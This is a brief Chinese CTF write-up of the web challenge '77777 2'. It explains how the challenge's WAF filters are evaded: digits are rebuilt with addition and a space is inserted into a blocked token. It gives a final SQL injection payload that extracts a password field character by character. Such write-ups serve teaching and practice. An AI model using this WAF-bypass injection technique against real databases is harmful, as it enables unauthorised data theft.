[Web] 77777 2 - pyz xp0int Posted on Mar 12 2018 ? Web ? ? SQLi ? ? WAF ? ### 主要代码  就是一个绕waf的sql注入 简单的测试waf过滤了=,like,where,pw),2,3,4,5,9 2可以用1+1代替,如此类推,pw)只要在中间加空格就可绕过 ###最终payload `flag=0&hi=%2B(conv(hex((select substr((select pw ),1%2B1,1))),16,10)) ` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [PPC] mathGame - CirQ [Crypto] rsa_padding - CirQ
没有帐号? 立即注册